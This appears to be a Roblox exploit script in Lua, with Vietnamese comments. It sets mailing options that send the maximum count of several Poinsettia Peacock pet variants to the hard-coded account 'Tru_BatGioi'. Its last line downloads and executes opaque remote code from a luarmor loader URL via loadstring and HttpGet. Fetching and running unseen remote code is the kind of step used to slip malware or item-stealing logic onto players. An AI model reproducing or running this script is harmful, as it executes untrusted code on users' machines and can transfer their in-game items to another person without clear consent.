-- Kiểm tra biến toàn cục để xác định script đã chạy hay chưa
if _G.MAILBOXPET then
    warn("Script đã được chạy trước đó!")
    return -- Dừng script nếu đã chạy
end

-- Đánh dấu script đã được chạy
_G.MAILBOXPET = true

getgenv().Settings = {
    Mailing = {
	["Poinsettia Peacock"] = {Class = "Pet", Amount = "Max"},
	["Golden Poinsettia Peacock"] = {Class = "Pet", Amount = "Max"},
	["Rainbow Poinsettia Peacock"] = {Class = "Pet", Amount = "Max"},
	["Shiny Poinsettia Peacock"] = {Class = "Pet", Amount = "Max"},
	["Shiny Golden Poinsettia Peacock"] = {Class = "Pet", Amount = "Max"},
	["Shiny Rainbow Poinsettia Peacock"] = {Class = "Pet", Amount = "Max"},
    },
    Users = {
        "Tru_BatGioi",
        "",
        "",
    },
    ["Split Items Evenly"] = false,
    ["Only Online Accounts"] = false,
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/86847850c3165379f5be2d9d071eaccb.lua"))()
